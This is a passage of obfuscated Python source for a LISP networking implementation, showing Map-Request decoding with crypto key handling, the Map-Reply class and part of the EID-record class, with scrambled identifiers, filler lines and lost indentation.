lprint ( "Bad JSON 'signature-eid' value: {}" . format ( I111o0oooO00o0 ) )
return ( None )
if 96 - 96: o0oOOo0O0Ooo * I11i * Oo0Ooo
if 36 - 36: OoooooooOO + ooOoO0o . oO0o * ooOoO0o + IiII
self . signature_eid . afi = LISP_AFI_IPV6
self . signature_eid . store_address ( I111o0oooO00o0 )
if 45 - 45: oO0o / iII111i + I1ii11iIi11i - Oo0Ooo - ooOoO0o . iIii1I11I1II1
if ( o0OOOO00O . has_key ( "signature" ) == False ) : return ( packet )
oOOo0OoooOo = binascii . a2b_base64 ( o0OOOO00O [ "signature" ] )
self . map_request_signature = oOOo0OoooOo
return ( packet )
if 52 - 52: I1IiiI + i1IIi . iII111i * I1IiiI
if 31 - 31: Oo0Ooo % iIii1I11I1II1 . O0
def decode ( self , packet , source , port ) :
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 80 - 80: I11i / Oo0Ooo + I1ii11iIi11i
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
i1IiIiiiii11 = i1IiIiiiii11 [ 0 ]
packet = packet [ oO0o00O : : ]
if 18 - 18: II111iiii - iII111i / iIii1I11I1II1 % OoOoOO00 % I1ii11iIi11i / o0oOOo0O0Ooo
o00OooooOOOO = "Q"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 47 - 47: OOooOOo
OO00OO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
packet = packet [ oO0o00O : : ]
if 24 - 24: Ii1I % o0oOOo0O0Ooo
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 )
self . auth_bit = True if ( i1IiIiiiii11 & 0x08000000 ) else False
self . map_data_present = True if ( i1IiIiiiii11 & 0x04000000 ) else False
self . rloc_probe = True if ( i1IiIiiiii11 & 0x02000000 ) else False
self . smr_bit = True if ( i1IiIiiiii11 & 0x01000000 ) else False
self . pitr_bit = True if ( i1IiIiiiii11 & 0x00800000 ) else False
self . smr_invoked_bit = True if ( i1IiIiiiii11 & 0x00400000 ) else False
self . mobile_node = True if ( i1IiIiiiii11 & 0x00200000 ) else False
self . xtr_id_present = True if ( i1IiIiiiii11 & 0x00100000 ) else False
self . local_xtr = True if ( i1IiIiiiii11 & 0x00004000 ) else False
self . dont_reply_bit = True if ( i1IiIiiiii11 & 0x00002000 ) else False
self . itr_rloc_count = ( ( i1IiIiiiii11 >> 8 ) & 0x1f ) + 1
self . record_count = i1IiIiiiii11 & 0xff
self . nonce = OO00OO [ 0 ]
if 87 - 87: o0oOOo0O0Ooo % iII111i / ooOoO0o - IiII + i11iIiiIii
if 85 - 85: OoooooooOO * IiII . OOooOOo / iII111i / OoooooooOO
if 87 - 87: OoO0O00
if 32 - 32: i11iIiiIii - OoOoOO00 * I11i . Oo0Ooo * ooOoO0o
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( packet ) == False ) : return ( None )
if 21 - 21: OOooOOo
if 11 - 11: oO0o % i11iIiiIii * O0
oO0o00O = struct . calcsize ( "H" )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 28 - 28: I1Ii111 / iIii1I11I1II1 + OOooOOo . I1ii11iIi11i % OOooOOo + OoO0O00
oO0oO00 = struct . unpack ( "H" , packet [ : oO0o00O ] )
self . source_eid . afi = socket . ntohs ( oO0oO00 [ 0 ] )
packet = packet [ oO0o00O : : ]
if 79 - 79: oO0o
if ( self . source_eid . afi == LISP_AFI_LCAF ) :
I11I1iIiI1I = packet
packet = self . source_eid . lcaf_decode_iid ( packet )
if ( packet == None ) :
packet = self . lcaf_decode_json ( I11I1iIiI1I )
if ( packet == None ) : return ( None )
if 83 - 83: i11iIiiIii + iIii1I11I1II1
elif ( self . source_eid . afi != LISP_AFI_NONE ) :
packet = self . source_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 21 - 21: o0oOOo0O0Ooo / i11iIiiIii % I1Ii111
self . source_eid . mask_len = self . source_eid . host_mask_len ( )
if 56 - 56: o0oOOo0O0Ooo * iIii1I11I1II1 . Ii1I + OoOoOO00 % I1Ii111
iiI1i111I1 = ( os . getenv ( "LISP_NO_CRYPTO" ) != None )
self . itr_rlocs = [ ]
while ( self . itr_rloc_count != 0 ) :
oO0o00O = struct . calcsize ( "H" )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 26 - 26: OoooooooOO . i1IIi + OoO0O00
oO0oO00 = struct . unpack ( "H" , packet [ : oO0o00O ] ) [ 0 ]
if 42 - 42: i11iIiiIii * o0oOOo0O0Ooo % I11i % Oo0Ooo + o0oOOo0O0Ooo * i11iIiiIii
oo0O0oO0o = lisp_address ( LISP_AFI_NONE , "" , 32 , 0 )
oo0O0oO0o . afi = socket . ntohs ( oO0oO00 )
if 66 - 66: Ii1I / IiII . OoooooooOO * Oo0Ooo % i11iIiiIii
if 100 - 100: I1ii11iIi11i % II111iiii * i11iIiiIii - iII111i
if 69 - 69: OOooOOo + iII111i / I1Ii111
if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
if 93 - 93: ooOoO0o + ooOoO0o
if ( oo0O0oO0o . afi != LISP_AFI_LCAF ) :
if ( len ( packet ) < oo0O0oO0o . addr_length ( ) ) : return ( None )
packet = oo0O0oO0o . unpack_address ( packet [ oO0o00O : : ] )
if ( packet == None ) : return ( None )
if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
if ( iiI1i111I1 ) :
self . itr_rlocs . append ( oo0O0oO0o )
self . itr_rloc_count -= 1
continue
if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
if 32 - 32: Oo0Ooo . O0
oOo0O = lisp_build_crypto_decap_lookup_key ( oo0O0oO0o , port )
if 48 - 48: I1ii11iIi11i % II111iiii + I11i
if 25 - 25: IiII * o0oOOo0O0Ooo / I1IiiI . IiII % II111iiii
if 50 - 50: OoOoOO00 * iII111i
if 59 - 59: I1IiiI * I1IiiI / I11i
if 92 - 92: o0oOOo0O0Ooo
if ( lisp_nat_traversal and oo0O0oO0o . is_private_address ( ) and source ) : oo0O0oO0o = source
if 8 - 8: iII111i + I1ii11iIi11i . Ii1I
ii1I11ii1I11 = lisp_crypto_keys_by_rloc_decap
if ( ii1I11ii1I11 . has_key ( oOo0O ) ) : ii1I11ii1I11 . pop ( oOo0O )
if 78 - 78: iIii1I11I1II1 + OoO0O00 + i11iIiiIii
if 21 - 21: Oo0Ooo + Ii1I % ooOoO0o + OoOoOO00 % I11i
if 22 - 22: i1IIi / OoooooooOO . OoO0O00
if 83 - 83: I1IiiI - OoooooooOO + I1ii11iIi11i . Ii1I / o0oOOo0O0Ooo + ooOoO0o
if 90 - 90: I1IiiI - i11iIiiIii
if 42 - 42: OOooOOo . Oo0Ooo
lisp_write_ipc_decap_key ( oOo0O , None )
else :
IiIIIii1iIII1 = packet
i1i1IIiIiI11 = lisp_keys ( 1 )
packet = i1i1IIiIiI11 . decode_lcaf ( IiIIIii1iIII1 , 0 )
if ( packet == None ) : return ( None )
if 61 - 61: i11iIiiIii % I1Ii111 / o0oOOo0O0Ooo
if 40 - 40: OOooOOo / Ii1I % I1IiiI / o0oOOo0O0Ooo . iII111i
if 78 - 78: I11i - I1IiiI * IiII
if 43 - 43: OoooooooOO . OOooOOo
IIiIiIii11I1 = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM ,
LISP_CS_25519_CHACHA ]
if ( i1i1IIiIiI11 . cipher_suite in IIiIiIii11I1 ) :
if ( i1i1IIiIiI11 . cipher_suite == LISP_CS_25519_CBC or
i1i1IIiIiI11 . cipher_suite == LISP_CS_25519_GCM ) :
iII1 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 33 - 33: o0oOOo0O0Ooo % OoOoOO00 * I1IiiI
if ( i1i1IIiIiI11 . cipher_suite == LISP_CS_25519_CHACHA ) :
iII1 = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 26 - 26: I11i . iII111i . o0oOOo0O0Ooo
else :
iII1 = lisp_keys ( 1 , do_poly = False , do_curve = False ,
do_chacha = False )
if 15 - 15: OoO0O00 / iII111i
packet = iII1 . decode_lcaf ( IiIIIii1iIII1 , 0 )
if ( packet == None ) : return ( None )
if 46 - 46: OoooooooOO . I1Ii111
if ( len ( packet ) < oO0o00O ) : return ( None )
oO0oO00 = struct . unpack ( "H" , packet [ : oO0o00O ] ) [ 0 ]
oo0O0oO0o . afi = socket . ntohs ( oO0oO00 )
if ( len ( packet ) < oo0O0oO0o . addr_length ( ) ) : return ( None )
if 15 - 15: Ii1I
packet = oo0O0oO0o . unpack_address ( packet [ oO0o00O : : ] )
if ( packet == None ) : return ( None )
if 84 - 84: OoOoOO00 - ooOoO0o - OoooooooOO . OoooooooOO % IiII
if ( iiI1i111I1 ) :
self . itr_rlocs . append ( oo0O0oO0o )
self . itr_rloc_count -= 1
continue
if 38 - 38: OoO0O00 * I1ii11iIi11i
if 4 - 4: OoO0O00 . I1ii11iIi11i
oOo0O = lisp_build_crypto_decap_lookup_key ( oo0O0oO0o , port )
if 21 - 21: i11iIiiIii / OoO0O00 / I1ii11iIi11i * O0 - II111iiii * OOooOOo
II = None
if ( lisp_nat_traversal and oo0O0oO0o . is_private_address ( ) and source ) : oo0O0oO0o = source
if 87 - 87: Ii1I * iII111i * O0
if 93 - 93: IiII % I1Ii111 % II111iiii
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oOo0O ) ) :
O0000 = lisp_crypto_keys_by_rloc_decap [ oOo0O ]
II = O0000 [ 1 ] if O0000 and O0000 [ 1 ] else None
if 20 - 20: OoooooooOO * I1Ii111
if 38 - 38: iII111i . OoooooooOO
i1iiI11ii1II1 = True
if ( II ) :
if ( II . compare_keys ( iII1 ) ) :
self . keys = [ None , II , None , None ]
lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( oOo0O , False ) ) )
if 33 - 33: oO0o / I11i . OoOoOO00 * O0 - IiII
else :
i1iiI11ii1II1 = False
ii1IIi = bold ( "Remote decap-rekeying" , False )
lprint ( "{} for RLOC {}" . format ( ii1IIi , red ( oOo0O ,
False ) ) )
iII1 . copy_keypair ( II )
iII1 . uptime = II . uptime
II = None
if 44 - 44: I1IiiI + IiII / I1ii11iIi11i
if 31 - 31: II111iiii - I1ii11iIi11i % I11i . o0oOOo0O0Ooo - i11iIiiIii / I11i
if 100 - 100: i11iIiiIii * i11iIiiIii . iIii1I11I1II1 % iII111i * I1ii11iIi11i
if ( II == None ) :
self . keys = [ None , iII1 , None , None ]
if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
iII1 . local_public_key = None
lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
False ) , red ( oOo0O , False ) ) )
elif ( iII1 . remote_public_key != None ) :
if ( i1iiI11ii1II1 ) :
lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
# Ii1I
red ( oOo0O , False ) ) )
if 91 - 91: IiII * i11iIiiIii / I1ii11iIi11i / i1IIi . IiII
iII1 . compute_shared_key ( "decap" )
iII1 . add_key_by_rloc ( oOo0O , False )
if 35 - 35: i11iIiiIii / OoooooooOO
if 36 - 36: iII111i
if 91 - 91: ooOoO0o + IiII . I1IiiI / I11i / IiII
if 23 - 23: I1ii11iIi11i - OOooOOo - i1IIi
self . itr_rlocs . append ( oo0O0oO0o )
self . itr_rloc_count -= 1
if 20 - 20: OoooooooOO / Oo0Ooo * OoO0O00 . o0oOOo0O0Ooo . I1IiiI
if 75 - 75: iIii1I11I1II1 - Ii1I % O0 % IiII
oO0o00O = struct . calcsize ( "BBH" )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 6 - 6: Oo0Ooo % oO0o * ooOoO0o - i1IIi . OoOoOO00
O00 , Ooo0o00 , oO0oO00 = struct . unpack ( "BBH" , packet [ : oO0o00O ] )
self . subscribe_bit = ( O00 & 0x80 )
self . target_eid . afi = socket . ntohs ( oO0oO00 )
packet = packet [ oO0o00O : : ]
if 20 - 20: Oo0Ooo / I1Ii111 . Oo0Ooo
self . target_eid . mask_len = Ooo0o00
if ( self . target_eid . afi == LISP_AFI_LCAF ) :
packet , OO0O0ooOo = self . target_eid . lcaf_decode_eid ( packet )
if ( packet == None ) : return ( None )
if ( OO0O0ooOo ) : self . target_group = OO0O0ooOo
else :
packet = self . target_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = packet [ oO0o00O : : ]
if 23 - 23: OoO0O00 / IiII * II111iiii
return ( packet )
if 32 - 32: I1Ii111 - iIii1I11I1II1 / I11i * OoO0O00 * OoO0O00
if 77 - 77: I1ii11iIi11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . target_eid , self . target_group ) )
if 16 - 16: II111iiii - II111iiii * I11i / OOooOOo . IiII
if 36 - 36: I11i / iIii1I11I1II1
def encode_xtr_id ( self , packet ) :
oO0ooOoOooO00o00 = self . xtr_id >> 64
o0Ooo00Oo0oo0 = self . xtr_id & 0xffffffffffffffff
oO0ooOoOooO00o00 = byte_swap_64 ( oO0ooOoOooO00o00 )
o0Ooo00Oo0oo0 = byte_swap_64 ( o0Ooo00Oo0oo0 )
packet += struct . pack ( "QQ" , oO0ooOoOooO00o00 , o0Ooo00Oo0oo0 )
return ( packet )
if 59 - 59: i1IIi
if 85 - 85: I1Ii111 + iIii1I11I1II1 + ooOoO0o + Oo0Ooo
def decode_xtr_id ( self , packet ) :
oO0o00O = struct . calcsize ( "QQ" )
if ( len ( packet ) < oO0o00O ) : return ( None )
packet = packet [ len ( packet ) - oO0o00O : : ]
oO0ooOoOooO00o00 , o0Ooo00Oo0oo0 = struct . unpack ( "QQ" , packet [ : oO0o00O ] )
oO0ooOoOooO00o00 = byte_swap_64 ( oO0ooOoOooO00o00 )
o0Ooo00Oo0oo0 = byte_swap_64 ( o0Ooo00Oo0oo0 )
self . xtr_id = ( oO0ooOoOooO00o00 << 64 ) | o0Ooo00Oo0oo0
return ( True )
if 75 - 75: O0 . I11i - Ii1I / I1Ii111 / I1ii11iIi11i % I11i
if 97 - 97: OoOoOO00 - OoO0O00
if 64 - 64: i1IIi / OoooooooOO / I1ii11iIi11i - Oo0Ooo + oO0o
if 6 - 6: OOooOOo % II111iiii * IiII
if 34 - 34: I11i % iII111i - ooOoO0o - I1IiiI
if 44 - 44: Ii1I . o0oOOo0O0Ooo . iIii1I11I1II1 + OoooooooOO - I1IiiI
if 22 - 22: I11i * I1ii11iIi11i . OoooooooOO / Oo0Ooo / Ii1I
if 54 - 54: I1Ii111 % Ii1I + ooOoO0o
if 45 - 45: Ii1I / oO0o * I1Ii111 . Ii1I
if 25 - 25: I1ii11iIi11i / I1ii11iIi11i
if 79 - 79: Oo0Ooo - OoO0O00 % Oo0Ooo . II111iiii
if 84 - 84: ooOoO0o * OoooooooOO + O0
if 84 - 84: i1IIi . I11i . i1IIi . Oo0Ooo
if 21 - 21: II111iiii . O0 + Oo0Ooo - i11iIiiIii
if 5 - 5: iIii1I11I1II1 * i11iIiiIii + OoO0O00 + I11i * O0 % ooOoO0o
if 88 - 88: o0oOOo0O0Ooo / i11iIiiIii * I1ii11iIi11i
if 23 - 23: O0 / iII111i
if 66 - 66: i1IIi % OoooooooOO * i11iIiiIii + oO0o * O0 / OoO0O00
if 14 - 14: I1IiiI . IiII
if 29 - 29: OoooooooOO / IiII + OoOoOO00 - I1Ii111 + IiII . i1IIi
if 26 - 26: i11iIiiIii - II111iiii
if 43 - 43: I1IiiI
if 35 - 35: ooOoO0o + OoOoOO00 * OoooooooOO - II111iiii
if 19 - 19: i1IIi / Ii1I / OoOoOO00 . I1IiiI / Ii1I % o0oOOo0O0Ooo
if 39 - 39: ooOoO0o - OoooooooOO
if 88 - 88: i1IIi + iIii1I11I1II1 * i11iIiiIii - OoooooooOO % o0oOOo0O0Ooo
if 74 - 74: ooOoO0o - i11iIiiIii
if 34 - 34: IiII + I1Ii111 + Oo0Ooo / II111iiii
if 33 - 33: Ii1I . i1IIi - II111iiii - OoO0O00
if 31 - 31: I11i - OoOoOO00 / o0oOOo0O0Ooo * OoOoOO00 / Oo0Ooo + o0oOOo0O0Ooo
if 46 - 46: IiII * OoO0O00 / OOooOOo + Oo0Ooo
if 24 - 24: ooOoO0o % OOooOOo . O0 * Oo0Ooo
class lisp_map_reply ( ) :
def __init__ ( self ) :
self . rloc_probe = False
self . echo_nonce_capable = False
self . security = False
self . record_count = 0
self . hop_count = 0
self . nonce = 0
self . keys = None
if 52 - 52: O0 . I1Ii111 + iII111i / i11iIiiIii
if 52 - 52: oO0o % Oo0Ooo * II111iiii
def print_map_reply ( self ) :
I111 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
if 24 - 24: i11iIiiIii * i1IIi * i1IIi
lprint ( I111 . format ( bold ( "Map-Reply" , False ) , "R" if self . rloc_probe else "r" ,
# o0oOOo0O0Ooo + i1IIi
"E" if self . echo_nonce_capable else "e" ,
"S" if self . security else "s" , self . hop_count , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
if 40 - 40: i11iIiiIii - I11i + iIii1I11I1II1 * I1Ii111
if 19 - 19: IiII + I1Ii111
def encode ( self ) :
i1IiIiiiii11 = ( LISP_MAP_REPLY << 28 ) | self . record_count
i1IiIiiiii11 |= self . hop_count << 8
if ( self . rloc_probe ) : i1IiIiiiii11 |= 0x08000000
if ( self . echo_nonce_capable ) : i1IiIiiiii11 |= 0x04000000
if ( self . security ) : i1IiIiiiii11 |= 0x02000000
if 65 - 65: Ii1I - oO0o + i1IIi + OOooOOo % iII111i
ii1i1II = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
ii1i1II += struct . pack ( "Q" , self . nonce )
return ( ii1i1II )
if 5 - 5: OoO0O00 / iII111i / OOooOOo
if 70 - 70: OoOoOO00 - I11i + ooOoO0o / i11iIiiIii / I1IiiI % iIii1I11I1II1
def decode ( self , packet ) :
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 83 - 83: oO0o . Ii1I - o0oOOo0O0Ooo % I11i + i11iIiiIii
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
i1IiIiiiii11 = i1IiIiiiii11 [ 0 ]
packet = packet [ oO0o00O : : ]
if 40 - 40: O0 . Ii1I
o00OooooOOOO = "Q"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 58 - 58: i11iIiiIii * iII111i / Ii1I - oO0o - I1ii11iIi11i % o0oOOo0O0Ooo
OO00OO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
packet = packet [ oO0o00O : : ]
if 16 - 16: OoooooooOO
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 )
self . rloc_probe = True if ( i1IiIiiiii11 & 0x08000000 ) else False
self . echo_nonce_capable = True if ( i1IiIiiiii11 & 0x04000000 ) else False
self . security = True if ( i1IiIiiiii11 & 0x02000000 ) else False
self . hop_count = ( i1IiIiiiii11 >> 8 ) & 0xff
self . record_count = i1IiIiiiii11 & 0xff
self . nonce = OO00OO [ 0 ]
if 71 - 71: Ii1I % O0 / I1Ii111 % iII111i - II111iiii / OoO0O00
if ( lisp_crypto_keys_by_nonce . has_key ( self . nonce ) ) :
self . keys = lisp_crypto_keys_by_nonce [ self . nonce ]
self . keys [ 1 ] . delete_key_by_nonce ( self . nonce )
if 30 - 30: I11i
return ( packet )
if 60 - 60: ooOoO0o - Ii1I . I1IiiI * oO0o * i11iIiiIii
if 29 - 29: OoO0O00 - Oo0Ooo . oO0o / OoO0O00 % i11iIiiIii
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
if 64 - 64: i1IIi / IiII . IiII - I1Ii111 % OOooOOo . II111iiii
if 78 - 78: I1Ii111 - O0 - I1Ii111 . iIii1I11I1II1 % I1ii11iIi11i . OoooooooOO
if 64 - 64: IiII
if 21 - 21: o0oOOo0O0Ooo - ooOoO0o * OoooooooOO . OoooooooOO
if 17 - 17: OOooOOo - iII111i % I1IiiI * OOooOOo * iIii1I11I1II1 . o0oOOo0O0Ooo
if 58 - 58: oO0o - II111iiii + O0
if 54 - 54: iIii1I11I1II1 - IiII - IiII
if 18 - 18: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii
if 63 - 63: iII111i - OoO0O00 * OOooOOo
if 89 - 89: iII111i / Oo0Ooo
if 66 - 66: o0oOOo0O0Ooo + OoOoOO00 % OoooooooOO . I11i
if 30 - 30: II111iiii - Oo0Ooo - i11iIiiIii + O0
if 93 - 93: i1IIi + I1Ii111 / OoO0O00 - I11i % Oo0Ooo / Ii1I
if 1 - 1: Oo0Ooo / Ii1I . i11iIiiIii % OOooOOo + o0oOOo0O0Ooo + O0
if 54 - 54: I1Ii111 + ooOoO0o % IiII
if 83 - 83: o0oOOo0O0Ooo * iIii1I11I1II1
if 36 - 36: OoOoOO00 + II111iiii - OoO0O00 % ooOoO0o * i1IIi
if 4 - 4: Ii1I + OoO0O00 * I1ii11iIi11i
if 13 - 13: OoOoOO00 - IiII * iIii1I11I1II1 * O0
if 26 - 26: OoooooooOO + oO0o + OoO0O00 . O0
if 46 - 46: OoooooooOO - Oo0Ooo * I1Ii111 * OOooOOo * I1Ii111 . oO0o
if 96 - 96: Ii1I / IiII % o0oOOo0O0Ooo + I11i
if 46 - 46: OoO0O00 * I1IiiI
if 25 - 25: I1Ii111 . IiII % O0 % i1IIi
if 53 - 53: O0 % ooOoO0o
if 41 - 41: IiII
if 29 - 29: ooOoO0o
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
class lisp_eid_record ( ) :
def __init__ ( self ) :
self . record_ttl = 0
self . rloc_count = 0
self . action = 0
self . authoritative = False
self . ddt_incomplete = False
self . signature_count = 0
self . map_version = 0
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . record_ttl = 0
if 22 - 22: i1IIi
if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
def print_prefix ( self ) :
if ( self . group . is_null ( ) ) :
return ( green ( self . eid . print_prefix ( ) , False ) )
if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
return ( green ( self . eid . print_sg ( self . group ) , False ) )
if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
def print_ttl ( self ) :
oo0OOoOO0 = self . record_ttl
if ( self . record_ttl & 0x80000000 ) :
oo0OOoOO0 = str ( self . record_ttl & 0x7fffffff ) + " secs"
elif ( ( oo0OOoOO0 % 60 ) == 0 ) :
oo0OOoOO0 = str ( oo0OOoOO0 / 60 ) + " hours"
else :
oo0OOoOO0 = str ( oo0OOoOO0 ) + " mins"
if 16 - 16: oO0o * iII111i % i1IIi . OoOoOO00 * iIii1I11I1II1
return ( oo0OOoOO0 )
if 17 - 17: OoooooooOO . OOooOOo
if 32 - 32: OoOoOO00 . oO0o + O0
def store_ttl ( self ) :
oo0OOoOO0 = self . record_ttl * 60
if ( self . record_ttl & 0x80000000 ) : oo0OOoOO0 = self . record_ttl & 0x7fffffff
return ( oo0OOoOO0 )
if 100 - 100: O0 / OOooOOo - ooOoO0o
if 15 - 15: iII111i - O0 - OoooooooOO
def print_record ( self , indent , ddt ) :
iiiiIIiiII1Iii1 = ""
OOo0O0O000 = ""
o0oOOoO0o0 = bold ( "invalid-action" , False )
if ( ddt ) :
if ( self . action < len ( lisp_map_referral_action_string ) ) :
o0oOOoO0o0 = lisp_map_referral_action_string [ self . action ]
o0oOOoO0o0 = bold ( o0oOOoO0o0 , False )
iiiiIIiiII1Iii1 = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
if 56 - 56: I1IiiI . I11i % iII111i
OOo0O0O000 = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
if 33 - 33: I11i / OOooOOo - OOooOOo / i11iIiiIii * OoOoOO00 + O0
if 2 - 2: i11iIiiIii % I1IiiI
else :
if ( self . action < len ( lisp_map_reply_action_string ) ) :
o0oOOoO0o0 = lisp_map_reply_action_string [ self . action ]
if ( self . action != LISP_NO_ACTION ) :
o0oOOoO0o0 = bold ( o0oOOoO0o0 , False )
if 90 - 90: II111iiii
if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
oO0oO00 = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
I111 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
if 71 - 71: i1IIi / I11i
lprint ( I111 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
o0oOOoO0o0 , "auth" if ( self . authoritative is True ) else "non-auth" ,
iiiiIIiiII1Iii1 , OOo0O0O000 , self . map_version , oO0oO00 ,
green ( self . print_prefix ( ) , False ) ) )
if 14 - 14: OoooooooOO
if 99 - 99: o0oOOo0O0Ooo * o0oOOo0O0Ooo
def encode ( self ) :
Ii1II1I = self . action << 13
if ( self . authoritative ) : Ii1II1I |= 0x1000
if ( self . ddt_incomplete ) : Ii1II1I |= 0x800
if 5 - 5: OOooOOo . iII111i . oO0o % IiII * O0
if 20 - 20: Oo0Ooo . I1IiiI . I1IiiI / OoooooooOO . OoooooooOO + iIii1I11I1II1
if 60 - 60: OoOoOO00 / ooOoO0o % iIii1I11I1II1
if 32 - 32: i11iIiiIii + II111iiii + II111iiii % I11i
oO0oO00 = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
if ( oO0oO00 < 0 ) : oO0oO00 = LISP_AFI_LCAF
o0000o0o = ( self . group . is_null ( ) == False )
if ( o0000o0o ) : oO0oO00 = LISP_AFI_LCAF
if 75 - 75: I11i - OoO0O00 - iII111i % iIii1I11I1II1 * OoO0O00
I1I1iI1i = ( self . signature_count << 12 ) | self . map_version
Ooo0o00 = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
if 13 - 13: OoO0O00 - Oo0Ooo / OoO0O00
ii1i1II = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
self . rloc_count , Ooo0o00 , socket . htons ( Ii1II1I ) ,
socket . htons ( I1I1iI1i ) , socket . htons ( oO0oO00 ) )
if 34 - 34: i11iIiiIii + OoO0O00 + i11iIiiIii . IiII % O0
if 64 - 64: o0oOOo0O0Ooo . iIii1I11I1II1
if 86 - 86: ooOoO0o - I11i . iIii1I11I1II1 - iIii1I11I1II1
if 61 - 61: Ii1I % Oo0Ooo + OoOoOO00
if ( o0000o0o ) :
ii1i1II += self . eid . lcaf_encode_sg ( self . group )
return ( ii1i1II )
if 60 - 60: oO0o . OoooooooOO
if 40 - 40: I11i
if 44 - 44: ooOoO0o
if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
if 97 - 97: I1IiiI / o0oOOo0O0Ooo
if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
ii1i1II = ii1i1II [ 0 : - 2 ]
ii1i1II += self . eid . address . encode_geo ( )
return ( ii1i1II )
if 13 - 13: I1ii11iIi11i
if 72 - 72: Oo0Ooo + IiII / Ii1I * Oo0Ooo
if 41 - 41: OOooOOo - OoOoOO00 . I1IiiI + i11iIiiIii + OoO0O00 * iII111i
if 85 - 85: OoO0O00 + II111iiii
if 87 - 87: OoO0O00
if ( oO0oO00 == LISP_AFI_LCAF ) :
ii1i1II += self . eid . lcaf_encode_iid ( )
return ( ii1i1II )
if 93 - 93: OoooooooOO
if 80 - 80: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii / OOooOOo + oO0o
if 10 - 10: OoO0O00 . OoO0O00 + O0
if 13 - 13: i1IIi . I1IiiI
ii1i1II += self . eid . pack_address ( )
return ( ii1i1II )
if 45 - 45: ooOoO0o % I11i
if 37 - 37: iII111i
def decode ( self , packet ) :
o00OooooOOOO = "IBBHHH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 70 - 70: O0 + iIii1I11I1II1 % O0 * o0oOOo0O0Ooo - Oo0Ooo - ooOoO0o
self . record_ttl , self . rloc_count , self . eid . mask_len , Ii1II1I , self . map_version , self . eid . afi = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 94 - 94: i1IIi + IiII / OoooooooOO - oO0o / OOooOOo / OoOoOO00
if 55 - 55: OOooOOo
if 5 - 5: I11i / OoOoOO00
self . record_ttl = socket . ntohl ( self . record_ttl )
Ii1II1I = socket . ntohs ( Ii1II1I )
self . action = ( Ii1II1I >> 13 ) & 0x7
self . authoritative = True if ( ( Ii1II1I >> 12 ) & 1 ) else False
self . ddt_incomplete = True if ( ( Ii1II1I >> 11 ) & 1 ) else False
self . map_version = socket . ntohs ( self . map_version )
self . signature_count = self . map_version >> 12
self . map_version = self . map_version & 0xfff
self . eid . afi = socket . ntohs ( self . eid . afi )
self . eid . instance_id = 0
packet = packet [ oO0o00O : : ]
